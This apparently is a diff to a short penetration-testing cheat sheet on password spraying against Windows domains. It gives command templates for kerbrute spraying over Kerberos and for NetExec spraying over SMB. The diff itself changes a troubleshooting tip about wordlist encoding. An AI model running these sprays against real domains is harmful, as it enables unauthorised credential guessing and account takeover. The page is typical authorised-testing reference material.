Password Spraying Attack

 Details

 This method is based on obtaining TGT for credential verification.
-The advantage is that it uses only two UDP frames (sends REQ-TGT and examines the response) kerbrute passwordspray -d <DOMAIN> --dc <DC_IP> <USERS_LIST> <PASS> Remove users who generate errors from wordlists.
+The advantage is that it uses only two UDP frames (sends REQ-TGT and examines the response) kerbrute passwordspray -d <DOMAIN> --dc <DC_IP> <USERS_LIST> <PASS> If you receive a network error, make sure that the encoding of wordlist is ANSI.
+You can use Notepad's Save As functionality to change the encoding.

 This method uses the SMB protocol to verify credentials (more traffic and slower). nxc smb <IP> -u <USERS_LIST> -p <PASS1> <PASS2> -d <DOMAIN> --continue-on-success | grep +